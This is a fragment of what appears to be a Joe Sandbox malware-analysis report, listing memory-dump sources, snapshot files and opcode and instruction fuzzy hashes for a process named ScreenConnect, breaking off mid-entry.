                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3900112670.0000000003990000.00000040.00000800.00020000.00000000.sdmp, Offset: 03990000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_3990000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: LR]q
                                                                                                                                                                                • API String ID: 0-3081347316
                                                                                                                                                                                • Opcode ID: a9e851c7cd1ee67df7b979be20097c06ed3754f4013f92011e755c33786f472b
                                                                                                                                                                                • Instruction ID: b28c1466b14bc4ce774706d32bcb0267f7469d8941902033307e574d3217ba6c
                                                                                                                                                                                • Opcode Fuzzy Hash: a9e851c7cd1ee67df7b979be20097c06ed3754f4013f92011e755c33786f472b
                                                                                                                                                                                • Instruction Fuzzy Hash: 6431E630A053448FDB15CB74DCA97AE7FB6AF8A700F28849ED402A73A1DB752D05CB52
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3889420081.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_11d0000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: LR]q
                                                                                                                                                                                • API String ID: 0-3081347316
                                                                                                                                                                                • Opcode ID: 4498f07a2226e5cb049c9924b0d12d3f661dac383e811be44f80ab8947412264
                                                                                                                                                                                • Instruction ID: c924ad4481d3584274d876d6c5a3f815c4713054b8622b5f60c251fad28ad5c3
                                                                                                                                                                                • Opcode Fuzzy Hash: 4498f07a2226e5cb049c9924b0d12d3f661dac383e811be44f80ab8947412264
                                                                                                                                                                                • Instruction Fuzzy Hash: 2A21E230B012049BD70C9F64CC59BBE7BB6ABC8B41F18846CE506AB291EFB19C41CB51
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3900112670.0000000003990000.00000040.00000800.00020000.00000000.sdmp, Offset: 03990000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_3990000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: LR]q
                                                                                                                                                                                • API String ID: 0-3081347316
                                                                                                                                                                                • Opcode ID: 12e8a30359e62599df0bb9bcf42129557b1618dc5230c2ce414cbb411b809ba9
                                                                                                                                                                                • Instruction ID: ec8d2f04bd62930421ea715fad462667f834cf442f9353d0b21bf0e2095bbe4f
                                                                                                                                                                                • Opcode Fuzzy Hash: 12e8a30359e62599df0bb9bcf42129557b1618dc5230c2ce414cbb411b809ba9
                                                                                                                                                                                • Instruction Fuzzy Hash: ED219630B002099FDF18DB65D9997BE77BAAF88B40F24842AD402A7390DFB45D45CB51
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3889420081.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_11d0000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: $]q
                                                                                                                                                                                • API String ID: 0-1007455737
                                                                                                                                                                                • Opcode ID: 1945e1ecc9a336d7c1aae0408cecf2e26c465195f42c76138703bf77e9158e57
                                                                                                                                                                                • Instruction ID: a327980237cb0d7cc3b31afc2d3bcf5006195973fb17db6dd13fea73fe203856
                                                                                                                                                                                • Opcode Fuzzy Hash: 1945e1ecc9a336d7c1aae0408cecf2e26c465195f42c76138703bf77e9158e57
                                                                                                                                                                                • Instruction Fuzzy Hash: 0CE0C230288200CFDB1DCF6CD980B4137B96F54602B1644AADC08CB272E731C401CB02
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3889420081.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_11d0000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 161c6536b9c8c1ab456086608a6a86309ae56207da77935cdb055ab8aa12ac19
                                                                                                                                                                                • Instruction ID: 6037bc20e79ac76c8a7ed4a706e9105ff78b6f0c4d39883a5d28b45fcb9d3ac6
                                                                                                                                                                                • Opcode Fuzzy Hash: 161c6536b9c8c1ab456086608a6a86309ae56207da77935cdb055ab8aa12ac19
                                                                                                                                                                                • Instruction Fuzzy Hash: EAA13D74B402098FDB18DFA8D594AADBBF1EF88300F158599E406AB3A5DB75EC05CF90
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3900112670.0000000003990000.00000040.00000800.00020000.00000000.sdmp, Offset: 03990000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_3990000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 1b98b0dfbd8d0796519400bc25d574313854c67bb3a6bc76c5138d95b9173548
                                                                                                                                                                                • Instruction ID: 917e529524d38d16cdc8ddd3532fb2e5fbab51749022cbd9b16323330284ad21
                                                                                                                                                                                • Opcode Fuzzy Hash: 1b98b0dfbd8d0796519400bc25d574313854c67bb3a6bc76c5138d95b9173548
                                                                                                                                                                                • Instruction Fuzzy Hash: A761D335B002098FCB05DF6DD484AAEBBFAEF88650B1445AAE506DB361DB30DC46CB91
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3889420081.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_11d0000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: b1fb45741632b8bc7ef5f8ddc124c2ccdc91184f9c33834e62c518e321b324ea
                                                                                                                                                                                • Instruction ID: 78fb3195279a35bc5c7e5feb7aa3a0324912b30cf76d2d4fcaa937a3e0042500
                                                                                                                                                                                • Opcode Fuzzy Hash: b1fb45741632b8bc7ef5f8ddc124c2ccdc91184f9c33834e62c518e321b324ea
                                                                                                                                                                                • Instruction Fuzzy Hash: 07514A34B002059FCB18DF6CD995A6AB7E6EFC831471484A9E54ACF366DB34EC068B91
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3889420081.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_11d0000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: ff6c0741395532751b38d73e0dbd3d2b16625afb8571295b0f3ccce5362b9b8b
                                                                                                                                                                                • Instruction ID: 613f354c36052a5476dbe5544dc7cfe20c0feb5abbe0a7a06c9ae89192a1f40d
                                                                                                                                                                                • Opcode Fuzzy Hash: ff6c0741395532751b38d73e0dbd3d2b16625afb8571295b0f3ccce5362b9b8b
                                                                                                                                                                                • Instruction Fuzzy Hash: E4514B34B002059FCB18EF6CD995A6AB7E6EFC83147148469E54ACF366DF70EC068B91
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3900112670.0000000003990000.00000040.00000800.00020000.00000000.sdmp, Offset: 03990000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_3990000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: d48ee1fb59178e1e35ba1d6f727b2879cad957c3f0398078754d3cc83d676f7f
                                                                                                                                                                                • Instruction ID: 75de3c59f2c0ffb2afeae7c013928aaa41df19aa6915cd5b7f8af6a8fd240c58
                                                                                                                                                                                • Opcode Fuzzy Hash: d48ee1fb59178e1e35ba1d6f727b2879cad957c3f0398078754d3cc83d676f7f
                                                                                                                                                                                • Instruction Fuzzy Hash: 3351CE34B003059FDB18EFB99990A2E7BEAEFC4740B18896AD1169B349DF309D45C781
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3900112670.0000000003990000.00000040.00000800.00020000.00000000.sdmp, Offset: 03990000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_3990000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 6b90b738c48f2ae74f65db96c42912f76a1b1f148d7f21237a8115eb0f019d84
                                                                                                                                                                                • Instruction ID: f4ffb83f2efeef67df4493e3bd0f416b72ce3af4f21ee1dfb7603d068b62b2c4
                                                                                                                                                                                • Opcode Fuzzy Hash: 6b90b738c48f2ae74f65db96c42912f76a1b1f148d7f21237a8115eb0f019d84
                                                                                                                                                                                • Instruction Fuzzy Hash: F4516D307007098FDB24DF2DD884A5ABBF9FF893507148A6AD486DB764EB30E805CB90
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3900112670.0000000003990000.00000040.00000800.00020000.00000000.sdmp, Offset: 03990000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_3990000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: cf5466570b0dcaa03644413b4bce1f6dc74ddc58e73282e803b487256c228859
                                                                                                                                                                                • Instruction ID: a4dd054f592e14901a46fea038f8d75a960b9f6bb0c6e8c364a611c6e2b80fcf
                                                                                                                                                                                • Opcode Fuzzy Hash: cf5466570b0dcaa03644413b4bce1f6dc74ddc58e73282e803b487256c228859
                                                                                                                                                                                • Instruction Fuzzy Hash: 3241D134B403019BEB19EBB99990A2E77DAAFC4750B18C96AD0169F389DF34CC45C781
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3889420081.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_11d0000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: b3909aa43122714cc0d96623719cfb277e4818f10d271a39e42c0f1c219c04f2
                                                                                                                                                                                • Instruction ID: 13410e52f17db03c78aad3b6ee975149886cd52087c4375ff8abfe71f1c73b18
                                                                                                                                                                                • Opcode Fuzzy Hash: b3909aa43122714cc0d96623719cfb277e4818f10d271a39e42c0f1c219c04f2
                                                                                                                                                                                • Instruction Fuzzy Hash: 8351F935600B01CFC728CF29D894A6AB7F2FF8D724B244A5CD4969B7A5DB31E806CB45
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3889420081.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_11d0000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 6a3dee247882f8e82da17dcda85f262322689f4f074d6946f60ccac9fe181ad7
                                                                                                                                                                                • Instruction ID: a40cf3f6cbb5d0becaab9461c3dc90f18d15026fc5b8ce4a5b7cba616088bbbc
                                                                                                                                                                                • Opcode Fuzzy Hash: 6a3dee247882f8e82da17dcda85f262322689f4f074d6946f60ccac9fe181ad7
                                                                                                                                                                                • Instruction Fuzzy Hash: 80519F30E503099FDB09DFB8D984B9DBBF5FF89700F108969E404AB295DB74A989CB50
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3889420081.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_11d0000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: c2c60498e73a4f2f5b3ab830556a2000d331b248954af9222be14ba09d882a96
                                                                                                                                                                                • Instruction ID: 77ef6c10765b9c51345dce2555ea4b7edcb69211eeae4659a9b35b55329f9f48
                                                                                                                                                                                • Opcode Fuzzy Hash: c2c60498e73a4f2f5b3ab830556a2000d331b248954af9222be14ba09d882a96
                                                                                                                                                                                • Instruction Fuzzy Hash: 74517D30E502099FDB05DFB8D984BDDBBF5FF88700F108A59E004AB2A4DB74A989CB50
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3900112670.0000000003990000.00000040.00000800.00020000.00000000.sdmp, Offset: 03990000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_3990000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 9be59854e2d072328f3a0d7788f4a1dd417837160ad0842807ab706181817c61
                                                                                                                                                                                • Instruction ID: 7552c8543b2ce9a3f4749d96f3eb1d82a57e4cd4787a6315d69b6c324a1fd833
                                                                                                                                                                                • Opcode Fuzzy Hash: 9be59854e2d072328f3a0d7788f4a1dd417837160ad0842807ab706181817c61
                                                                                                                                                                                • Instruction Fuzzy Hash: 18410930600B01CFDB24DF2AD84862AB7F5FF89355B144A6DD496CB7A5E730E806CB91
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3889420081.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_11d0000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: d92278a5870616b0f6e37f0f34724a08a64384d4eb8d19b28802c9f57db13615
                                                                                                                                                                                • Instruction ID: 80713e97acff23f69948c006638203df1c50baa5f42a5fabb2a94ec50c9f6fbf
                                                                                                                                                                                • Opcode Fuzzy Hash: d92278a5870616b0f6e37f0f34724a08a64384d4eb8d19b28802c9f57db13615
                                                                                                                                                                                • Instruction Fuzzy Hash: 63413371E0021A9BDB18DFA5C980BDEBBF5EF88704F148129E505B7244DB70AA47CB91
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3889420081.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_11d0000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 957ddc1a785ab21da54fe325aa707810103e31d07610b4c8988ed909de0b3d73
                                                                                                                                                                                • Instruction ID: 83ad50c06caa47f46b0b4ed3d1e9e101874f32b98016b8e57857b7a91aba4e2f
                                                                                                                                                                                • Opcode Fuzzy Hash: 957ddc1a785ab21da54fe325aa707810103e31d07610b4c8988ed909de0b3d73
                                                                                                                                                                                • Instruction Fuzzy Hash: 69413831B002118FC728DF28E55476EBBE6EF80714F18C96AD95A8B392DB35DC86C781
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3889420081.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_11d0000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: b82e0814e81157980183af6cd55a18fe5d1af892eeb1f12a96c5fe5663a1cc63
                                                                                                                                                                                • Instruction ID: 886b956d2602750dca7f9997e2c1fa7f71d8f93683ee5f4c4a3852c1e52ae864
                                                                                                                                                                                • Opcode Fuzzy Hash: b82e0814e81157980183af6cd55a18fe5d1af892eeb1f12a96c5fe5663a1cc63
                                                                                                                                                                                • Instruction Fuzzy Hash: DB417A316102058FCB18DB78D898BADBBF6EF88614B244569E406EB3A1DF749D05CB91
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3900112670.0000000003990000.00000040.00000800.00020000.00000000.sdmp, Offset: 03990000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_3990000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: cd1a9576b07720e8d9b65f5175487f5a3cb8a01ffdfd276c8f35500e650df6ec
                                                                                                                                                                                • Instruction ID: 17e3e0fae9f13edda6dc4ac322be80f00d8b3ce4c7a71186dc43604b6d095001
                                                                                                                                                                                • Opcode Fuzzy Hash: cd1a9576b07720e8d9b65f5175487f5a3cb8a01ffdfd276c8f35500e650df6ec
                                                                                                                                                                                • Instruction Fuzzy Hash: EA4141706007058FDB25CF2AC884A6BBBF6FF89350B148A59D4968B7A5D730E806CB90
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3889420081.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_11d0000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: b72a9fd3681779611d278b76bad50789d0c45743276b4245a4fc8a96d33732ce
                                                                                                                                                                                • Instruction ID: bbe2f214576c48a7e5f0232908a4248996426867478e92281fe92dcdd6aaf6c4
                                                                                                                                                                                • Opcode Fuzzy Hash: b72a9fd3681779611d278b76bad50789d0c45743276b4245a4fc8a96d33732ce
                                                                                                                                                                                • Instruction Fuzzy Hash: B8318131B002058BDB18DFA9C4546BEF7F6EF89358F14846AD406E7294DB71DD018B91
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3889420081.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_11d0000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 6708ea42c4b3e83046ebc1f5d5beeec76cdcf773a425b9a69923d90a72d4a95a
                                                                                                                                                                                • Instruction ID: c0c3e3d9991c2e21ee75bf6f16f80c99653714f6e6bb0a12cdbf741391595d24
                                                                                                                                                                                • Opcode Fuzzy Hash: 6708ea42c4b3e83046ebc1f5d5beeec76cdcf773a425b9a69923d90a72d4a95a
                                                                                                                                                                                • Instruction Fuzzy Hash: AB417B317102088FCB18DB79D854BAEBBF6EF88714B244569E406EB3A1DF74AD04CB91
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3900112670.0000000003990000.00000040.00000800.00020000.00000000.sdmp, Offset: 03990000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_3990000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 178efa0a1761a1361ab7c802d0b4e95f3ae4c3f47d713ce41184078d72172e64
                                                                                                                                                                                • Instruction ID: c3b0e9846f935afd4814d5819f363ae36556dfa0f120d96b9849ac5bae6cda7e
                                                                                                                                                                                • Opcode Fuzzy Hash: 178efa0a1761a1361ab7c802d0b4e95f3ae4c3f47d713ce41184078d72172e64
                                                                                                                                                                                • Instruction Fuzzy Hash: 66310931A042089FDF05EBACD85199D7FF5EF89260B0485EBD454CB362DA309905CB91
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3900112670.0000000003990000.00000040.00000800.00020000.00000000.sdmp, Offset: 03990000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_3990000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 3d88cb06b84433d0e42d8072402b655ab1aa6390e01918d02e3090239db20ce0
                                                                                                                                                                                • Instruction ID: f92fcc1c0d69265dbcfd19a79b951a0b21b7f2c91bb6bdc556c04c2bd76c263c
                                                                                                                                                                                • Opcode Fuzzy Hash: 3d88cb06b84433d0e42d8072402b655ab1aa6390e01918d02e3090239db20ce0
                                                                                                                                                                                • Instruction Fuzzy Hash: 76310731A04249CFDF16DB78DD64A9DBFF5AF8A300F0944AAC045AB3B1CA745C02CB91
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3900112670.0000000003990000.00000040.00000800.00020000.00000000.sdmp, Offset: 03990000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_3990000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: f7cef1b8c62ae466948f351b05a7a72d60eb8d8185eb51ddda0e4ad588b675d3
                                                                                                                                                                                • Instruction ID: bd4ec7d8b5d4895615e656a90e7096799bda62d6b0c132f3cc692598eac31fd7
                                                                                                                                                                                • Opcode Fuzzy Hash: f7cef1b8c62ae466948f351b05a7a72d60eb8d8185eb51ddda0e4ad588b675d3
                                                                                                                                                                                • Instruction Fuzzy Hash: 95317A34B106099BCB04DBACC58196EF7EAEFC9250B14856BD44AE7358DB30DC058BD1
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3889420081.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_11d0000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 4b52cb6915edba46b5aad143c95dbfc8999845eeba5097ef8838d0dee55a9b0c
                                                                                                                                                                                • Instruction ID: 029e9f356224acb347232c75160d2e42ade139abfbae917a768865c16dde4ec9
                                                                                                                                                                                • Opcode Fuzzy Hash: 4b52cb6915edba46b5aad143c95dbfc8999845eeba5097ef8838d0dee55a9b0c
                                                                                                                                                                                • Instruction Fuzzy Hash: 3E312870600B058FCB34DF69D84466ABBF1EF89320F148A6CD4969B6E5D770E94ACF80
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3900112670.0000000003990000.00000040.00000800.00020000.00000000.sdmp, Offset: 03990000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_3990000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 9832911eb676206cd3be79b8e696ae1262cf45860133db1df22e1fb3ecc86b79
                                                                                                                                                                                • Instruction ID: eee4729c5af4d601c203f5cc61f927da63a9bfb30067e9061415bf891bab8e8a
                                                                                                                                                                                • Opcode Fuzzy Hash: 9832911eb676206cd3be79b8e696ae1262cf45860133db1df22e1fb3ecc86b79
                                                                                                                                                                                • Instruction Fuzzy Hash: BC311670600B058FDB34DF29E88876ABBF5EF88751B144A2DD496876E1DB30E948CB91
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3889420081.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_11d0000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 2d061b7daff92219a0a768b42dcbcbc7f405ee8615802e8ff96c41ee40c6ab8b
                                                                                                                                                                                • Instruction ID: bd100cdf4431e1fa8e799543f88c9508053b8429853d2b2d1a048a6bb03ed0af
                                                                                                                                                                                • Opcode Fuzzy Hash: 2d061b7daff92219a0a768b42dcbcbc7f405ee8615802e8ff96c41ee40c6ab8b
                                                                                                                                                                                • Instruction Fuzzy Hash: 1D317CB1D043099FCB14DFA9C444AEEBFF5EF49320F10846AD919A7341DB78A545CBA4
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3889420081.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_11d0000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 0848101dfb1107e1ff3cab95a7345974497a7d17a1cfabb46fcd5657ba13c97f
                                                                                                                                                                                • Instruction ID: 3a198b7b8ed0445aaffba0d7de22f0841b3c69e5809101243bdebe599d43a067
                                                                                                                                                                                • Opcode Fuzzy Hash: 0848101dfb1107e1ff3cab95a7345974497a7d17a1cfabb46fcd5657ba13c97f
                                                                                                                                                                                • Instruction Fuzzy Hash: FB311A706007018FC734DF2AC844A6ABBF5EF89354B144A69D456DB7A5DB30E946CF81
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3889420081.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_11d0000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 65ec92d5f6601ffd8538952b5b28f9c662ab1476095a820ea475c062d1fa565b
                                                                                                                                                                                • Instruction ID: 67e3942da032be04c1add74dd93d04056df6bc0c07acaa6573b7cdd60f3567d8
                                                                                                                                                                                • Opcode Fuzzy Hash: 65ec92d5f6601ffd8538952b5b28f9c662ab1476095a820ea475c062d1fa565b
                                                                                                                                                                                • Instruction Fuzzy Hash: 0B313574A04205CFCB08DFB4D988A9EBFF5FF45310B0185A6D915DB252DB30AD00CB52
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3889420081.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_11d0000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
